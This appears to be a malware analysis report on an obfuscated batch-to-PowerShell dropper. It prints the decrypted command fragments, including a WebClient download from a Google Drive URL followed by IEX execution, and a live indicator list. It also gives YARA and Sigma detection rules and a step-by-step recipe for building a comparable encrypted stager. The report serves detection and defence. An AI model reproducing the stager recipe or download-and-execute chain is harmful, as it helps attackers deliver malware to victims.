typeanalysisfamilyunclassified-danish-batch-ps-dropperconfidencemediumcreated2026-07-27updated2026-07-27scriptdropperc2defense-evasionexecutionobfuscationmitre-attck
SHA-256: 93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0

unclassified-danish-batch-ps-dropper: 93aec3da — Base64+XOR Monokrome fragments, Google Drive C2

Executive Summary: Second observed sibling in the Danish-variable batch→PowerShell dropper family. Shares the stride-4 character-skip cipher (stolthe168) and IEX reflective execution chain with sibling 402879ff, but adds two significant upgrades: (1) nineteen Base64+XOR-encrypted PowerShell command fragments delivered via a nested Monokrome function, and (2) a Google Drive direct-download URL as the stage-2 source. Hardcoded payload carve offsets are 138643 / 15571 bytes. Fabricated Firefox 150.0 User-Agent. Static-only analysis; CAPE skipped because the file is a single-line batch script.

What It Is

Field Value
SHA-256 93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0
Filename PO# ATVHCWS26-387 HANSUNG VINA..bat
Size 4,134 bytes
File type ASCII text, single line, no line terminators ^[file.txt]
Family unclassified-danish-batch-ps-dropper — second confirmed sibling
Build DOS batch wrapper → inline PowerShell; no compiler, no packer

The outer layer is a .bat file that invokes powershell.exe -NoProfile -windowstyle 1 with a 4,091-character inline script. ^[strings.txt:1] The -windowstyle 1 argument is an alias for -windowstyle Normal, but in this context it simply prevents the hidden-window flag from appearing in command-line telemetry.

How It Works

1. Character-skip cipher (stolthe168)

The script defines stolthe168($sekl), a stride-4 decoder with offset 3 (same arithmetic as sibling 402879ff): real characters sit at indices 3, 7, 11, ... inside noise-padded string literals. ^[strings.txt:1] Unlike the first sibling, the decoded fragments here do not form plaintext commands directly. Instead they assemble the body of a secondary decoder function named Monokrome:

$script:balance=[Convert]::FromBase64String($sekl)
$script:voltaseis252=[Text.Encoding]::ASCII.GetString($balance)

(Decoded from concatenated stolthe168 outputs; see reconstruction below.)

2. Base64+XOR fragment decryption (Monokrome)

Monokrome($sekl,$untessella=0) takes a Base64 string, decodes it, XORs every byte with the key $scopu22 = @(66,97,110,97) (ASCII Bana), and optionally IEXs the result if $untessella is truthy.

Nineteen Monokrome calls are embedded in the script body. Eleven carry the 1 parameter (decrypt + execute); eight decrypt only (store in variables). Decrypted fragments include:

# Decrypted value Executed?
0 5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0 No — stored in $geolog (User-Agent)
1 https://drive.google.com/uc?export=download&id=14Led1yEUXipMpwH6VgGsTwaS0lN2tUNv No — stored in $samfundsn (URL)
2 > No — dead code (likely a fragment remnant)
3 $global:calci=$env:appdata+$mbelfadmixesor Yes
4 $global:fald=$samfundsn.split($senntalndledn) Yes
5 [Net.ServicePointManager]::SecurityProtocol=3072 Yes
6 $global:uvejrssk=New-Object Net.WebClient Yes
7 $uvejrssk.Headers[[Net.HttpRequestHeader]40]=$geolog Yes
8 DownloadFile No — stored in $sendeb (method name)
9 $uvejrssk.$sendeb.Invoke($samfundsn,$passalu) No — stored in $dkse (download invocation)
10 $global:levned=(Test-Path $passalu) Yes
11 $global:sickeespre=$true Yes
12 Sleep(4) Yes
13 $global:levned=(Test-Path $passalu) Yes
14 $global:dripp=$global:cocka++%$fald.count Yes
15 $global:biologi=gc $passalu Yes
16 $global:Scenopi=[Convert]::FromBase64String($biologi) Yes
17 $global:arbe=[Text.Encoding]::ASCII.GetString($Scenopi) Yes
18 $global:tappehall=$arbe.substring($mizp,$fiskeb) Yes

Execution chain: Monokrome decrypts the fragment, builds the PowerShell code via Mutismss (&$afsnitsn $sammen where $afsnitsn decodes to IEX), and either stores or executes it. ^[strings.txt:1]

3. Downloader behavior

After the fragments execute, the runtime state is:

  • $samfundsn = Google Drive direct-download URL
  • $geolog = fabricated Firefox 150.0 UA
  • $passalu = %appdata%\Beregn166.Ove (staging path)
  • $mizp = 138643, $fiskeb = 15571 (hardcoded carve offsets)

The script then:

  1. Sets TLS 1.2 (SecurityProtocol=3072)
  2. Spins up a Net.WebClient with the fake UA
  3. Calls .DownloadFile($samfundsn, $passalu)
  4. Waits 4 seconds and checks file existence
  5. Reads the downloaded file, Base64-decodes it, converts to ASCII
  6. Extracts substring(138643, 15571) — the inner payload
  7. IEXs the carved payload

4. Obfuscation quality

  • Noise-padded literals: The stolthe168 arguments are 59–149 character strings of Danish/Scandinavian word salad (Skaldship Pengestrmsanalysen Koldblodigt klapperslanger, uglies villigeres Cushie pondgrass). ^[strings.txt:1]
  • Variable names: Danish/Nordic (blegnesun, kokette57, senntalndledn, voltaseis252). Same linguistic fingerprint as sibling 402879ff.
  • Dead code: mp 'afghan' 'trim' 'diago' at script start; unused variable assignments inside stolthe168.
  • No VM/debug checks: Relies on being a text file that sandboxes may skip. ^[dynamic-analysis.md]

C2 Infrastructure

Indicator Value
Stage-2 URL https://drive.google.com/uc?export=download&id=14Led1yEUXipMpwH6VgGsTwaS0lN2tUNv ^[strings.txt:1]
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0 ^[strings.txt:1]
Staging path %appdata%\Beregn166.Ove
Payload carve offset 138643, length 15571 bytes
Reflective execution IEX via $afsnitsn decoder

Google Drive is used as a free, reputation-whitelisted staging host. The uc?export=download endpoint bypasses the preview page and returns the raw file directly.

Interesting Tidbits

  • Firefox 150.0: The User-Agent claims Firefox 150.0, a version that does not exist (current ESR is ~115, release ~128). This is a fabricated string reused from sibling 402879ff (which claimed 143.0). ^[strings.txt:1]
  • XOR key "Bana": The Monokrome decryption key is the four-byte ASCII string Bana — short, English, and identical across all nineteen fragments. This is a significant opsec regression vs. per-fragment keys.
  • Larger carve than sibling: 402879ff carved at offset 428386 / length 22190. This sample uses offset 138643 / length 15571 — a smaller payload, suggesting a different stage-2 file.
  • No service termination: Sibling 402879ff stopped a prior service (spsv ichoglanop) before staging. This sample omits that step.
  • Purchase-order lure: Filename PO# ATVHCWS26-387 HANSUNG VINA..bat masquerades as a purchase-order document, exploiting the "Hide extensions" default. ^[metadata.json]

How To Mess With It (Homelab Replication)

Goal: Build a comparable batch→PowerShell stager with Base64+XOR encrypted fragments.

  1. Write a PowerShell payload downloader.
  2. Split it into command fragments.
  3. Encrypt each fragment with Base64(XOR(plaintext, key=b'Bana')).
  4. Embed a Monokrome-style decoder that reconstructs and IEX's each fragment.
  5. Wrap in a batch file: powershell.exe -NoProfile -windowstyle 1 "<script>".
  6. Execute and verify network traffic shows the fake UA and Google Drive fetch.

Deployable Signatures

YARA rule

rule DanishBatchPSDropper_Monokrome {
    meta:
        description = "Danish-variable batch→PowerShell dropper with stolthe168/Monokrome Base64+XOR fragments"
        author = "PacketPursuit"
        date = "2026-07-27"
        hash = "93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0"
    strings:
        $stolthe168 = "function stolthe168" ascii wide
        $monokrome   = "function Monokrome" ascii wide
        $mutismss   = "function Mutismss" ascii wide
        $afsnitsn   = "$afsnitsn" ascii wide
        $bana_key   = {24 73 63 6f 70 75 32 32 3d 40 28 36 36 2c 39 37 2c 31 31 30 2c 39 37 29}  // $scopu22=@(66,97,110,97)
        $partitu114 = "function partitu114" ascii wide
    condition:
        filesize < 10KB and
        3 of ($stolthe168, $monokrome, $mutismss, $afsnitsn, $partitu114) and
        any of ($bana_key)
}

Behavioral hunt query (Sigma-like)

title: Danish Batch PowerShell Dropper Execution
detection:
    selection:
        CommandLine|contains:
            - 'powershell.exe -NoProfile -windowstyle 1'
            - 'function stolthe168'
            - 'function Monokrome'
            - '$scopu22=@(66,97,110,97)'
    condition: selection

IOC list

Type Value
SHA-256 93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0
Filename PO# ATVHCWS26-387 HANSUNG VINA..bat
Google Drive ID 14Led1yEUXipMpwH6VgGsTwaS0lN2tUNv
Staging file %appdata%\Beregn166.Ove
XOR key Bana (0x42,0x61,0x6e,0x61)
Fake UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0

Detection Signatures

capa / ATT&CK Mapping Evidence
T1059.003 Windows Command Shell Batch script outer layer ^[file.txt]
T1059.001 PowerShell Inline PowerShell with IEX ^[strings.txt:1]
T1105 Ingress Tool Transfer Net.WebClient.DownloadFile to Google Drive ^[strings.txt:1]
T1620 Reflective Code Loading IEX execution of carved substring ^[strings.txt:1]
T1027 Obfuscated Files or Information stolthe168 stride-4 cipher + Base64+XOR fragments ^[strings.txt:1]

References

Provenance

Analysis derived from static artefacts in raw/analyses/93aec3da641e8a2d7191e5ec96e1678984c2441f129d6e91ad5741c896e1dfb0/. File typed as ASCII text with very long lines (4134 chars, no line terminators) ^[file.txt]. Strings extracted via strings ^[strings.txt]. FLOSS and capa both failed because the input is not a supported binary class ^[floss.txt] ^[capa.txt]. CAPE skipped detonation for the same reason ^[dynamic-analysis.md]. Decryption performed manually via Python scripts replicating the stolthe168 stride-4 decoder and the Monokrome Base64→XOR pipeline.